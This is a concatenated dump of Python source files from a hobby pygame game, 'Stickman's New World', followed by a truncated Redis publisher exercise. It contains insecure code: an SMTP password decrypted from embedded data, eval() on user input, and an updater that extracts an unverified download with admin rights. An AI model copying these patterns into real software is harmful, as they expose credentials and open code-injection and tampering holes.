# - init -
pygame.init()
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
#screen_rect = screen.get_rect()
pygame.display.set_caption(
"Fracking System (because \"Tracking System\" sounded too wierd")
# - objects -
rectangle = pygame.rect.Rect(0, 0, 30, 30)
rectangle_draging = False
# - mainloop -
clock = pygame.time.Clock()
running = True
while running:
# - events -
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
elif event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
if rectangle.collidepoint(event.pos):
rectangle_draging = True
mouse_x, mouse_y = event.pos
offset_x = rectangle.x - mouse_x
offset_y = rectangle.y - mouse_y
elif event.type == pygame.MOUSEBUTTONUP:
if event.button == 1:
rectangle_draging = False
elif event.type == pygame.MOUSEMOTION:
if rectangle_draging:
mouse_x, mouse_y = event.pos
rectangle.x = mouse_x + offset_x
rectangle.y = mouse_y + offset_y
# - updates (without draws) -
# empty
# - draws (without updates) -
screen.fill(WHITE)
pygame.draw.rect(screen, RED, rectangle)
pygame.display.flip()
# - constant game speed / FPS -
clock.tick(FPS)
# - end -
pygame.quit()
import math
import sys
import os
from pprint import pprint
import pygame as pg
from pygame.locals import QUIT
sys.stdout = open(os.path.join(os.environ['USERPROFILE'], 'Desktop', 'stdout.log'), 'w')
CLOCK = pg.time.Clock()
FPS = 60
class Arcer:
def __init__(self, img, range_, pos):
self.img = img
self.range = range_
self.rect = img.get_rect(topleft=pos)
self.sizey = self.rect.y
self.sizex = self.rect.x
self.update_coords(pos)
def update_coords(self, pos):
self.topleft = pos
self.bottomleft = pos[0], pos[1] + self.sizey
self.topright = pos[0] + self.sizex, pos[1]
self.bottomright = pos[0] + self.sizex, pos[1] + self.sizey
self.rect = self.img.get_rect(topleft=pos)
def draw(self, surf):
surf.blit(self.img, self.topright)
def get_parabola(self, target):
f = lambda x: (2 / math.pi) * math.atan(2 * (chary - tary) / (charx - tarx) ** 2 * (x - tarx))
pt2 = tarx, tary = target
pt1 = charx, chary = self.topleft
playx, playy = [], []
actualx = charx
actualy = chary
i = charx
print('local variables before while loop:', end='')
pprint(locals())
while i <= 610 and i >= -1000:
perc = f(actualx)
print('actualx:', actualx, 'actualy:', actualy)
print('playy: ', playy, '\n', 'playx: ', playx)
print('charx, chary, tarx, tary to make sure they arent changing:', charx, chary, tarx, tary)
actualy += perc
actualx += 1 - perc
playy.append(math.floor(actualy))
playx.append(math.floor(actualx))
if tarx >= charx:
i += 1
else:
i -= 1
return playx, playy
# if val == 0:
# while i <= 610 and i >= -1000:
# array.append((chary, round((chary - tary) / val * pow((i - tarx), 2) + tary)))
# if tarx >= charx:
# i += 1
# else:
# i -= 1
# else:
# while i <= 610 and i >= -1000:
# array.append((i, round((chary - tary) / val * pow((i - tarx), 2) + tary)))
# if tarx >= charx:
# i += 1
# else:
# i -= 1
def main():
display = pg.display.set_mode((800, 400))
testsurf = pg.Surface((10, 10))
testsurf.fill((0, 255, 0))
target = (300, 300)
test = Arcer(testsurf, 100, (20, 20))
a = pg.Surface((10, 10))
a.fill((0, 0, 255))
display.blit(a, target)
arr = test.get_parabola(target)
#print(arr)
index = 0
import time
time.sleep(3)
while True:
for ev in pg.event.get():
if ev.type == QUIT:
pg.quit()
raise SystemExit
pg.display.update()
display.fill((0, 0, 0))
display.blit(testsurf, (arr[0][index], arr[1][index]))
#test.draw(display)
#print(index)
index += 1
CLOCK.tick(25)
display.blit(a, target)
if __name__ == '__main__':
main()
"""
request_email.py
requests the user's email address for bug reports.
"""
import tkinter as tk
import os
MESSAGE = '''you can enter your email
address here, and if the game crahses,
it should be reported to me,
and I can get back to you and \ntry and get it fixed!\n
(it is completely optional,\npress \'skip\' to continue)
if you dont get it, it means you didnt enter the correct email address.
contact me at <michaelveenstra12@gmail.com> for help if you do that
you should recieve a confirmation email :)
oh yeah, I wont sell it to anyone either'''
try:
FILE = os.path.join((os.environ['USERPROFILE'] if os.name ==
'nt' else os.environ['']), '.stickman_new_world', 'useremail')
except KeyError:
wrong_os()
def main():
print('hi')
variables = {}
if os.path.exists(FILE):
return
root = tk.Tk()
root.title('email address')
root.geometry('250x270')
root.protocol('WM_DELETE_WINDOW', lambda: exit(variables))
entry = tk.Entry(root, text='email:')
entry.place(anchor='center', relx=0.5, rely=0.5)
entry.pack(fill=None, expand=True)
label = tk.Label(root, text=MESSAGE)
label.pack(fill=None, expand=True)
skip = tk.Button(root, text='skip', command=lambda: exit(variables))
skip.place(x=220, y=100)
skip.pack()
done = tk.Button(root, text='done',
command=lambda: get_text(entry, variables))
done.place(x=200, y=100)
done.pack()
while True:
print('hi')
if variables.get('quit'):
return
elif variables.get('entry_data'):
remember(variables)
send_confirm(variables)
root.destroy()
root.update()
def get_text(entry, variables):
print(entry.get())
variables['entry_data'] = entry.get()
def exit(v):
v['quit'] = True
def remember(item):
with open(FILE, 'w') as openfile:
openfile.write(item['entry_data'])
exit(item)
def send_confirm(items):
import smtplib
import bugreport
from cryptography.fernet import Fernet
sender = 'bugreporter.smr@gmail.com'
reciever = [items['entry_data']]
message = f'''To: <{reciever}>
From: <{sender}>
Subject: confirmation email
Hi! if you are recieving this email, it means you have successfully
gotten your email address to me. Since you didn't give your password,
you shouldnt have any troubles. I will only use this when I have a very important
thing to tell you, or if the game crashes on your computer, I will be alerted
and try to fix the problem and tell you about it as well. Thanks!
-sincerely, Michael Gill (creater of stickman\'s new world)
'''
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
a = Fernet(bugreport.HIUEFWILEIURFHE).decrypt(
bugreport.FYUKYFVKFYVHUFL).decode()
server.ehlo()
server.login(sender, a)
server.sendmail(sender, reciever, message)
server.close()
try:
main()
except Exception as e:
import bugreport
bugreport.default_smr(e, 'in request_email')
import pygame as pg
from pygame.locals import *
from threading import Thread
FPS = 60
SCREEN_X, SCREEN_Y = 800, 600
RECT_X, RECT_Y = 10, 10
RIGHT_CLICK = 1
GREEN = (0, 200, 0)
RED = (200, 0, 0)
def main():
pg.init()
global DISPLAY, CLOCK
DISPLAY = pg.display.set_mode((SCREEN_X, SCREEN_Y))
CLOCK = pg.time.Clock()
screen_image = pg.image.load('..\\data\\dash_skeleton.png').convert()
DISPLAY.blit(screen_image, (0, 0))
rect1 = Rect(SCREEN_X // 2, SCREEN_Y // 2, RECT_X, RECT_Y)
drag = False
while True:
for event in pg.event.get():
if event.type == QUIT:
pg.quit()
raise SystemExit
drag_if_supposed_to(rect1, event, drag)
pg.display.update()
DISPLAY.blit(screen_image, (0, 0))
pg.draw.rect(DISPLAY, GREEN, rect1)
pg.display.flip()
CLOCK.tick(FPS)
def drag_if_supposed_to(rect, event, drag=False):
if event.type == MOUSEBUTTONDOWN:
if event.button == RIGHT_CLICK and rect.collidepoint(event.pos):
print('boccoloni')
drag = True
mouse_x, mouse_y = event.pos
off_x = rect.x - mouse_x
off_y = rect.y - mouse_y
elif event.type == MOUSEBUTTONUP:
if event.button == RIGHT_CLICK:
drag = False
elif event.type == MOUSEMOTION:
if drag:
mouse_x, mouse_y = event.pos
rect.x = mouse_x + off_x
rect.y = mouse_y + off_y
return drag
main()
from time import sleep
import os
while True:
os.system('python format.py')
sleep(10 * 60)
"""a replacement and better written file than main.py.
for starting the game.
"""
from argparse import Namespace
import copy
import os
# pylint: disable=no-name-in-module
from pygame.locals import QUIT, MOUSEBUTTONDOWN, MOUSEMOTION
import pygame as pg
from class_.character_image import CharacterImage
import class_
from database import COLOURS, MAIN_GAME_STATE
import database
import gameplay
# window sizes
WIN_X, WIN_Y = 800, 600
MID_X = WIN_X // 2
MID_Y = WIN_X // 2
CENTRE = MID_X, MID_Y
CENTRE_X, CENTRE_Y = database.SURFACE.get_rect().center
WHITE = COLOURS['white']
BLACK = COLOURS['black']
FPS = 60
PICS = database.PICS
# (:()-|--<
# parts created on computer, assembled in canada.
# NO BATTERIES REQUIRED
# (except in the computer, maybe)
def _border(surf, colour):
"""puts a rectangular border around
surf's rectangle.
"""
rect = surf.get_rect()
bottom = rect.bottomleft, rect.bottomright
top = rect.topleft, rect.topright
left = rect.topleft, rect.bottomleft
right = rect.topright, rect.bottomright
lines = [(rect.bottomright[0] - 1, rect.bottomright[1] - 1),
(rect.bottomleft[0], rect.bottomleft[1] - 1),
(rect.topleft[0], rect.topleft[0]),
(rect.topright[0] - 1, rect.topright[1])]
pg.draw.lines(surf, colour, True, lines)
class Box:
"""box that can hold an image."""
border = True
selected = False
def __init__(self,
topleft,
width,
height,
colour=BLACK,
image=None,
onclick=lambda: None,
):
self.topleft = topleft
self.colour = colour
self.image = image
self.width = width
self.height = height
self.onclick = onclick
top, left = self.topleft
self.rect = pg.Rect((top, left), (self.width, self.height))
def draw(self, surf):
"""draw the box to the screen."""
rect = self.rect
if self.selected:
# make the box red instead.
pg.draw.rect(surf, COLOURS['red'], rect, 1)
else:
pg.draw.rect(surf, self.colour, rect, 1)
if self.image is not None:
img_rect = self.image.get_rect()
img_rect.center = rect.center
surf.blit(self.image, img_rect)
def handle(self, event, *args, **kwargs):
"""handle the event. if it is clicked on, then call and return
self.onclick. if not, do nothing.
"""
try:
if self.rect.collidepoint(event.pos) and event.type == MOUSEBUTTONDOWN:
return self.onclick(*args, **kwargs)
except AttributeError:
# incorrect event.
pass
# clock for keeping track of FPS
CLOCK = pg.time.Clock()
# SURFACE is already created in database
SURFACE = database.SURFACE
class ClickableLabel:
"""a label that can be clicked. when it is, then call
a designated function.
"""
underlined = False
shaded = False
def __init__(self,
text,
pos,
function,
forecolour,
backcolour=None,
shade=True,
textsize=16,
*args,
**kwargs
):
self.text = text
self.pos = pos
self.function = function
self.shade = shade
self.textsize = textsize
self.forecolour = forecolour
self.backcolour = backcolour
self.args = args
self.kwargs = kwargs
def _shade(self, colour=COLOURS['grey']):
"""shade the current rect."""
newsurf = pg.Surface((self.rect.width, self.rect.height))
newsurf.set_alpha(75)
newsurf.fill(colour)
self.textsurf.blit(newsurf, (0, 0))
def draw(self, surface):
"""draw the label to the screen."""
fontobj = pg.font.Font(
os.path.join('data', 'Michael`s Font.ttf'),
self.textsize,
)
textsurf = fontobj.render(
self.text, True, self.forecolour, self.backcolour)
textrect = textsurf.get_rect()
textrect.center = self.pos
self.rect = textrect
self.textsurf = textsurf
mouseover = self.rect.collidepoint(
pg.mouse.get_pos())
# print(pg.mouse.get_pos())
#@print(self.rect.topleft)
if mouseover:
# print('shading')
self._shade()
self.shaded = True
else:
self.shaded = False
# if self.underlined:
# start, end = self.rect.bottomleft, self.rect.bottomright
# pg.draw.line(surface, self.forecolour, start, end)
surface.blit(textsurf, textrect)
def update(self, surface):
"""updates the label."""
# if self.rect.underlined:
# self.rect.underline(surface)
def handle(self, event, surface):
if event.type == MOUSEMOTION:
if self.rect.collidepoint(event.pos):
self.shaded = True
elif (event.type == MOUSEBUTTONDOWN and
self.rect.collidepoint(event.pos)):
self.underlined = not self.underlined
def is_selected(self):
return self.rect.underlined
def main():
"""start the game"""
# set caption and title screen
pg.display.set_caption("Stickman's New World")
pg.display.set_icon(PICS['game_icon'])
# place starting image on screen
SURFACE.blit(PICS['title_screen'], (0, 0))
continue_ = True
while continue_:
SURFACE.blit(PICS['title_screen'], (0, 0))
SURFACE.blit(MAIN_GAME_STATE['CURSOR'], pg.mouse.get_pos())
for event in pg.event.get():
check_quit(event)
if event.type == MOUSEBUTTONDOWN:
# on to the next loop
continue_ = not continue_
pg.display.update()
func = lambda: None
continue_ = True
rects = draw_choices()
pg.mixer.music.load(os.path.join(
os.getcwd(), 'music', 'smnwtheme.mp3'
))
pg.mixer.music.play(-1) # loop forever, until stopped
while continue_:
SURFACE.blit(PICS['menu_background'], (0, 0))
label("Stickman's New World", CENTRE_X, 100, size=60)
for lbl in rects:
lbl.draw(SURFACE)
for event in pg.event.get():
check_quit(event)
for lbl in rects:
lbl.handle(event, SURFACE)
if event.type == MOUSEBUTTONDOWN and lbl.rect.collidepoint(*event.pos):
func = lbl.function
continue_ = False
SURFACE.blit(MAIN_GAME_STATE['CURSOR'], pg.mouse.get_pos())
pg.display.update()
CLOCK.tick(FPS)
func()
def drawopt(text, x, y, func=0):
"""draw text tto the screen at (x, y).
return class_.MyRect of rectangle."""
fontobj = pg.font.Font(os.path.join('data', 'Michael`s Font.ttf'), 32)
textsurf = fontobj.render(text, True, WHITE)
textrect = textsurf.get_rect()
textrect.center = (x, y)
SURFACE.blit(textsurf, textrect)
return class_.MyRect(textrect), textsurf, func
def check_quit(event):
"""check if event is a quit event. if it is, quit."""
if event.type == QUIT:
pg.quit()
raise SystemExit
def label(text, x, y, size=32, colour=WHITE):
"""draw a static label to the screen."""
fontobj = pg.font.Font(os.path.join('data', 'Michael`s Font.ttf'), size)
textsurf = fontobj.render(text, True, colour)
textrect = textsurf.get_rect()
textrect.center = (x, y)
SURFACE.blit(textsurf, textrect)
def draw_choices():
"""draw all the options to click on
on game start.
"""
# print(centre_x, centre_y)
# choices = [
# drawopt('New Game', centre_x, centre_y - 50, 1),
# drawopt('Load Game', centre_x, centre_y, 2),
# drawopt('Settings', centre_x, centre_y + 50, 3)
# ]
choices = [
ClickableLabel("New Game", (CENTRE_X, CENTRE_Y - 100),
RECT_FUNCS[1], WHITE, textsize=40),
ClickableLabel("Load Game", (CENTRE_X, CENTRE_Y),
RECT_FUNCS[0], WHITE, textsize=40),
ClickableLabel("Settings", (CENTRE_X, CENTRE_Y + 100),
RECT_FUNCS[2], WHITE, textsize=40),
]
return choices
START_X, START_Y = 100, WIN_Y // 2
def _make_coloured(box):
if box._colour == 0:
box._colour = 1
box.colour = COLOURS['red']
return box
else:
box._colour = 0
box.colour = COLOURS['white']
return None
def new_game():
char_imgs = [
CharacterImage('swordsman',
# fake weapon. only has colour attribute
Namespace(colour='grey'),
(START_X, START_Y),
None,
),
CharacterImage('angel',
Namespace(colour='gold'),
(START_X + 150, START_Y),
None,
),
CharacterImage('archer',
Namespace(colour='brown'),
(START_X + 300, START_Y),
None,
),
CharacterImage('spearman',
Namespace(colour='grey'),
(START_X + 450, START_Y),
None,
),
CharacterImage('wizard',
Namespace(colour='blue'),
(START_X + 600, START_Y),
None,
),
]
selected_char_imgs = [
CharacterImage('swordsman',
# fake weapon. only has colour attribute
Namespace(colour='grey'),
(12, 16),
None,
),
CharacterImage('angel',
Namespace(colour='gold'),
(12, 16),
None,
),
CharacterImage('archer',
Namespace(colour='brown'),
(12, 16),
None,
),
CharacterImage('spearman',
Namespace(colour='grey'),
(12, 16),
None,
),
CharacterImage('wizard',
Namespace(colour='blue'),
(12, 16),
None,
),
]
null = lambda: None
y = WIN_Y // 2 + 30
char_lbls = [
ClickableLabel(
'Swordsman',
(START_X, y),
null,
WHITE,
textsize=24
),
ClickableLabel(
'Angel',
(START_X + 150, y),
null,
WHITE,
textsize=24,
),
ClickableLabel(
'Archer',
(START_X + 300, y),
null,
WHITE,
textsize=24,
),
ClickableLabel(
'Spearman',
(START_X + 450, y),
null,
WHITE,
textsize=24,
),
ClickableLabel(
'Wizard',
(START_X + 600, y),
null,
WHITE,
textsize=24,
),
]
# this is a list of four, and contains a box aligned with its image.
chosen = [(None, None)] * 4
def set_(box):
old = get_selected()
# print(old, 'HoWdY YoU FeLlErS')
old.selected = False
box.selected = True
chosen_boxes = [
Box((250, 400), 30, 30, WHITE, onclick=lambda: set_(chosen_boxes[0])),
Box((350, 400), 30, 30, WHITE, onclick=lambda: set_(chosen_boxes[1])),
Box((450, 400), 30, 30, WHITE, onclick=lambda: set_(chosen_boxes[2])),
Box((550, 400), 30, 30, WHITE, onclick=lambda: set_(chosen_boxes[3])),
]
chosen_boxes[0].selected = True
def get_selected():
"""return the selected box."""
for i in chosen_boxes:
if i.selected:
# print(chosen_boxes.index(i))
return i
continue_ = True
num_selected = 0
next_button = ClickableLabel(
"Next", (700, 420), lambda: None, WHITE, textsize=50)
next_button.draw(SURFACE)
if None not in chosen:
# fills the next_button.rect spot. will not show up yet
next_button.draw(SURFACE)
filled = False
while continue_:
SURFACE.blit(PICS['menu_background'], (0, 0))
if None not in chosen:
next_button.draw(SURFACE)
filled = True
label('Choose your players:', MID_X, 75, 60)
for box in chosen_boxes:
box.draw(SURFACE)
for i in char_imgs:
i.build_image(SURFACE, COLOURS['beige'], False)
for i in char_lbls:
i.draw(SURFACE)
# if i.underlined:
# add_chosen(char_lbls, i, char_imgs[char_lbls.index(i)])
for event in pg.event.get():
check_quit(event)
for lbl in char_lbls:
lbl.handle(event, SURFACE)
if event.type == MOUSEBUTTONDOWN and lbl.rect.collidepoint(*event.pos):
# need to add the character's image to the selected box.
item = selected_char_imgs[char_lbls.index(lbl)]
box = chosen_boxes.index(get_selected())
chosen[box] = (item, get_selected())
if event.type == MOUSEBUTTONDOWN and \
next_button.rect.collidepoint(*event.pos) and \
filled:
continue_ = False
for box in chosen_boxes:
box.handle(event)
for pair in chosen:
if pair == (None, None):
break
character, box = pair
coords = box.topleft[0] + 10, box.topleft[1] + 17
character.update_coords(coords)
character.build_image(SURFACE, COLOURS['beige'], False)
# pg.display.update()
# print((str(num_selected) + "\n") * 10)
SURFACE.blit(MAIN_GAME_STATE['CURSOR'], pg.mouse.get_pos())
pg.display.update()
CLOCK.tick(24)
continue_ = True
MAIN_GAME_STATE["AREA"] = database.Area.MAP
MAIN_GAME_STATE["PLAYERS"] = get_characters_from_images([i[0] for i in chosen])
gameplay.main()
def get_characters_from_images(images):
"""get and return an actual character type, not
just an image of it.
"""
names = [i.type_ for i in images]
characters = []
namestotypes = {
'swordsman': class_.Swordsman,
'angel': class_.Angel,
'archer': class_.Archer,
'spearman': class_.Spearman,
'wizard': class_.Wizard,
}
num = 1
for name in names:
characters.append(namestotypes[name](num, MAIN_GAME_STATE, copy.copy(database.DEFAULT_WEAPONS[name])))
num += 1
return characters
class FakeWeapon:
def __init__(self, colour):
self.colour = colour
RECT_FUNCS = {
0: lambda: None,
1: new_game,
2: lambda: None,
}
if __name__ == '__main__':
main()
"""
dicts.py
this module holds functions and data that deal
with large dictionaries, which this game uses a lot
of
GetPics-return a dictionary containing
string keys and pygame image equivelants.
COLOURS: a dictionary containing string keys
and RGB tuple values."""
import os
print('Howdy')
import pprint
from pygame.image import load
import pygame as pg
from database import ALL, COLOURS
__author__ = 'Michael Gill'
__version__ = '0.0'
CHANGE_COLOUR_DIRS = ('characters_parts',
'heads',
'attacks',
) + tuple(ALL['all_weapons'].values())
print(CHANGE_COLOUR_DIRS)
def gather_pics(dir='.'):
dictionary = {}
enddir = os.path.split(dir)[-1]
for item in os.listdir(dir):
if '.' in item:
pname, extension = [x.lower() for x in item.split('.')]
fname = os.path.join(dir, item)
if os.path.isdir(os.path.join(dir, item)):
dictionary[item] = gather_pics(fname)
elif extension in ('png', 'jpg'):
dictionary[pname] = pg.image.load(fname)
if enddir in CHANGE_COLOUR_DIRS:
# heads, attacks, and weapons should be of each colour
# print(dir)
di = dictionary[pname] = {}
for col in COLOURS:
# print(dir, col)
rgb_col = COLOURS[col]
di[col] = pg.image.load(os.path.join(dir, item))
change_colour_surface(di[col], *rgb_col)
return dictionary
def change_colour_surface(surface, r, g, b):
"""changes the colour of all parts of a
surface except for the transparent parts.
"""
arr = pg.surfarray.pixels3d(surface)
arr[:, :, 0] = r
arr[:, :, 1] = g
arr[:, :, 2] = b
if __name__ == '__main__':
dict = gather_pics('data')
print('\n' * 1000)
pprint.pprint(dict)
# print(dict)
print('Howdy')
pg.image.save(gather_pics('data')['game_icon'], r'C:\Users\Michael\Desktop\test_images\howdy.png')
import subprocess
import platform
import os
if os.getcwd().endswith('game'):
os.chdir('..{0}updater'.format('\\' if os.name == 'nt' else '/'))
CMD = {
'Windows':
'auto_install.exe'
if os.path.exists('auto_install.exe') else ' python auto_install.py',
'Linux':
'auto_install'
if os.path.exists('auto_installl') else '/usr/bin/python3 auto_install.py'
}[platform.system()].split()
subprocess.Popen(CMD)
# kill the current process
raise SystemExit
"""
save.py- create game save for stickmans new world.
data: read_file
takes no arguments, and returns a data structure (dict)
of the save, without any of the classes.
write_file(data)
data must be a dict (or dict-like file like IniFile)
and write it to $HOME/.stickman_new_world/save/.smr-save on linux
or %USERPROFILE%/.stickman_new_world/save/.smr-save on windows
convert(data)
convert data from dict of strings to
actual stickman's new world data.
"""
import inifile
import os
import encrypt
from class_.inventory import InventoryHandler
def read_file():
game_state = {}
data_text, time = encrypt.decrypt()
data_file = os.path.join(
os.getenv('TMP'), '.save.ini') if os.name == 'nt' else '/tmp/.save.cfg'
with open(data_file, 'w') as open_file:
open_file.write(data_text)
ini_file = inifile.IniFile(data_file)
# print(ini_file.to_dict())
keys = ini_file.keys()
values = ini_file.values()
for key, value in zip(keys, values):
if '.' in key:
# value is in a category
klass, prop = key.split('.')
#print(klass, prop)
try:
game_state[klass]
except KeyError:
game_state[klass] = {}
game_state[klass][prop] = value
else:
game_state[key] = value
return game_state
def write_file(data):
if isinstance(data, dict):
data = to_inifile(data)
encrypt.encrypt(data)
def to_inifile(dict_):
file_str = ''
for key in dict_:
file_str += '[{}]\n'.format(key)
for i in dict_[key]:
file_str += '{}={}\n'.format(i, dict_[key][i])
file_str += '\n'
return file_str
def make_inventory(dictionary):
pos = []
for i in dictionary:
pos.append(int(i.split('x')[0]))
maxx = max(pos)
pos = []
for i in dictionary:
pos.append(int(i.split('x')[1]))
maxy = max(pos)
inv = InventoryHandler(maxx, maxy)
inv.sort_dict(dictionary)
return inv
if __name__ == '__main__':
write_file(open('misc\\shello.ini').read())
a = read_file()
#print(a)
#print(a['inventory'])
#print(make_inventory(a['inventory']))
"""settings.py- displays and changes the settings
for stickman's new world.
if the user settings
"""
import tkinter as tk
import os
import json
import platform
try:
import pwd
except ImportError:
# the OS is not linux
pass
__all__ = ['main', 'load_settings', 'save']
if platform.system() == 'Linux':
os.getlogin = lambda: pwd.getpwuid(os.getuid())[0]
DEF_NAME = 'settings.json'
USR_NAME = '.stickman_new_world{0}user_settings.json'.format(
'\\' if os.name == 'nt' else '/')
HOME = 'C:\\Users\\{}\\'.format(
os.getlogin()) if os.name == 'nt' else '/home/{}/'.format(os.getlogin())
print(HOME)
print()
SETTINGS_FILE_PATH = {
'posix':
HOME + USR_NAME if os.path.exists(HOME + USR_NAME) else 'settings.json',
'nt':
HOME + USR_NAME if os.path.exists(HOME + USR_NAME) else 'settings.json'
}[os.name]
SETTINGS_FILE = open(SETTINGS_FILE_PATH).read()
USR_SAVE_PATH = HOME + '{0}.stickman_new_world{0}'.format(
'\\' if os.name == 'nt' else '/')
USR_SAVE_FILE = HOME + USR_NAME
print(USR_SAVE_PATH)
print(SETTINGS_FILE_PATH)
def load_settings():
settings = json.JSONDecoder().decode(SETTINGS_FILE)
return settings
def main():
root = tk.Tk()
root.geometry('300x200')
root.title('settings')
root.protocol('WM_DELETE_WINDOW', lambda: save(usr_settings, root))
settings = load_settings()
settings_ = {}
print(settings)
for key, value in zip(settings, settings.values()):
if isinstance(value, bool):
settings_[key] = value
settings = settings_
print(settings)
usr_settings = settings.copy()
for i in usr_settings:
var = tk.IntVar()
var.set(usr_settings[i])
usr_settings[i] = var
for key, value, num in zip(settings, settings.values(), range(
len(settings))):
print(key, value, usr_settings)
tk.Checkbutton(
root, text=key, variable=usr_settings[key]).grid(
row=num, sticky=tk.W)
tk.mainloop()
def save(settings, win):
for i in settings:
# the settings are still IntVars
var = bool(settings[i].get())
# change them to normal ints
settings[i] = var
win.destroy()
if not os.path.exists(USR_SAVE_PATH):
os.mkdir(USR_SAVE_PATH)
# i like having an indent, for when i look at it :)
json_settings = json.dumps(settings, indent=4)
with open(USR_SAVE_FILE, 'w') as settings_file:
settings_file.write(json_settings)
main()
from pygame.locals import *
import pygame
import class_
import random
def closest(me, others):
possible_destinations = others
possible_destinations = [
abs(me - destination) for destination in possible_destinations
]
destination = min(possible_destinations)
return others[possible_destinations.index(destination)]
print(
closest(
int(input('number: ')),
eval(input('enter numbers to be closest to seperated by ,: '))))
from class_.events import *
def put_all(main_game_state, event):
for sprite in main_game_state.sprites():
sprite.internal_event(event)
def quit_all(main_game_state):
put_all(main_game_state, Quit())
with open('../stickmanranger.log') as o:
p = o.readlines()[-1]
with open('changes.html', 'r+') as o:
d = o.readlines()
import pprint
pprint.pprint(d)
index = d.index(
' </div> <!-- this is a comment just for automation.-->\n')
#d.insert(index, '<br/>hiiiiiiii\n')
d.insert(index, ''.join((' <br>', p, '\n')))
o.seek(0)
o.write(''.join(d))
o.truncate()
# -*- coding: utf-8 -*-
"""
auto_installer.py
this file downloads the new version of stickmanranger and installs it
"""
__author__ = 'Michael Gill'
__version__ = '0.0'
from queue import Queue
from platform import system
import tkinter as tk
import threading
import json
import ctypes
import sys
import urllib.request
import shutil
import tarfile
import os
Q = Queue()
PRINT_LOCK = threading.Lock()
class InstallWindow(tk.Frame):
destroyed = False
def __init__(self, master=None):
tk.Frame.__init__(self, master)
master.protocol("WM_DELETE_WINDOW", self.cancel_install)
self.master = master
master.title('auto-updater')
self.but = tk.Button(
master, text='cancel', command=self.cancel_install)
self.but.pack()
self.but.place(relx=0.4, rely=0.7)
self.pack()
def cancel_install(self):
self.destroyed = True
self.master.destroy()
def check_queue(self):
if Q.empty():
return False
data = Q.get()
# the versions have been loaded
print('is "data" a dict?:', isinstance(data, dict))
print('data:', data)
if data is None:
self.label = tk.Label(self.master, text='No updates available')
self.label.pack()
self.label.place(relx=0.0, rely=0.1)
self.but.destroy()
close_but = tk.Button(
self.master, text='close', command=self.cancel_install)
close_but.pack()
close_but.place(relx=0.4, rely=0.7)
if isinstance(data, dict):
data_string = 'current version: {current version} available version: {available version}'.format(
**data)
print('before tk.Label')
self.label = tk.Label(self.master, text=data_string)
print('after tk.Label')
self.label.pack()
self.label.place(relx=0.0, rely=0.1)
print('hello')
self.install_but = tk.Button(
self.master, text='install', command=lambda: run(self))
print('helo again')
self.install_but.pack()
self.install_but.place(relx=0.2, rely=0.7)
print('howdy')
elif isinstance(data, str):
self.label.destroy()
self.label = tk.Label(self.master, text=data)
self.label.pack()
self.label.place(relx=0.0, rely=0.1)
if system() not in ('Linux', 'Windows'):
raise TypeError('Not made for this %a' % system())
VER_URL = "https://drive.google.com/uc?export=download&id=17KGPTgF6xWKH3dk7Sd74niL548WU6Tts"
ARCHIVE_URL = "https://github.com/Michael78912/smnw-archives/blob/master/stickman's%20new%20world.tar.gz"
# temporary directory. use os.environ because it changes in windows
TEMP_PATH = '/tmp' if system() == 'Linux' else os.environ['TMP']
INSTALL_PATH = os.path.join(
os.environ['HOME'], '.stickman\'s new world/') if system(
) == 'Linux' else "C:\\Program Files (x86)\\stickman\'s new world\\"
def run(obj):
obj.install_but.destroy()
obj.but.destroy()
threading.Thread(target=main, daemon=True).start()
def main():
Q.put('fetching stickmanranger.tar.gz...')
with urllib.request.urlopen(ARCHIVE_URL,) as response, \
open(os.path.join(TEMP_PATH, 'stickmanranger.tmp.tar.gz'), 'wb') as out_file:
shutil.copyfileobj(response, out_file)
if os.path.exists(INSTALL_PATH + 'game'):
Q.put('removing previous installation')
shutil.rmtree(INSTALL_PATH + 'game')
# extract all contents to the path
Q.put('extracting contents')
tarfile.open(os.path.join(
TEMP_PATH,
'stickmanranger.tmp.tar.gz')).extractall(INSTALL_PATH + 'game')
Q.put('installation complete\nplease restart stickmans new world.')
def check():
data = {}
# VER_URL is a shared google drive link that has the current version of stickmanranger
with urllib.request.urlopen(VER_URL) as response:
version = response.read().decode()
# decode the current version from "settings.json"
current_version = json.JSONDecoder().decode(
open('..{0}game{0}config{0}linux_config.json'.format(
'\\' if os.name == 'nt' else '/')).read())['version']
# if the version is the same
with PRINT_LOCK:
print(current_version, version)
data['current version'] = current_version
data['available version'] = version
if data['current version'] == data['available version']:
Q.put(None)
else:
Q.put(data)
if current_version == version:
with PRINT_LOCK:
print('no new updates')
return False
def start_thread():
"""
starts the thread for the actual installation,
and use main thread for window.
"""
root = tk.Tk()
root.geometry('300x200')
window = InstallWindow(root)
# create thread for window, as mainloop cannot run other code at the same time
install_thread = threading.Thread(target=check, daemon=True)
install_thread.start()
while not window.destroyed:
try:
window.check_queue()
except: # 'cancel' button has been clicked, continue
...
if not window.destroyed: root.update()
def is_admin():
"""
return true if the program was run as an administrator
code not by me. thanks Martín De la Fuente!
https://stackoverflow.com/questions/130763/request-uac-elevation-from-within-a-python-script
"""
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
def name_main(started_from_main_=False):
global started_from_main
started_from_main = started_from_main_
if __name__ == '__main__':
if system() == 'Windows':
if is_admin():
start_thread()
else:
# Re-run the program with admin rightsos.getlogin = lambda: pwd.getpwuid(os.getuid())[0]
ctypes.windll.shell32.ShellExecuteW(
None, "runas", sys.executable, __file__, None, 1)
if system() == 'Linux':
start_thread()
name_main()
|
publish.py
|
#!/usr/bin/env python3
import json
import random
import redis
import time
from threading import Thread
# Replaces with your configuration information
redis_host = "localhost"
redis_port = 6379
redis_password = ""
event_channels = {
'login': 'user_event:login',
'view': 'user_event:view',
'logout': 'user_event:logout',
}
event_types = list(event_channels.keys())
def publisher():
"""Publishes simulated event messages to a Redis Channel"""
# Create a Redis connection object
for id in range(50):
# create the event as an dict with fields type and id
event = {}
event['type'] = event_types[ random.randint(0, len(event_types) - 1) ]
event['id'] = id
# convert the event to json and log to the console
event_message = json.dumps(event)
channel = event_channels[event['type']]
print("Sending message {} -> {}".format(event_message, channel))
# add code here to publish message
cnt = 0
print("Delivered message to {} subscribers".format(cnt))
time.sleep(0.001)
# send a terminate message to all clients
term = { 'type': 'terminate'}
term_message = json.dumps(term)
channel = 'process:terminate'
print("Sending terminate message")
# add code here to send the terminate meesage
cnt = 0
print("Delivered message to {} subscribers".format(cnt))
def run_publisher():
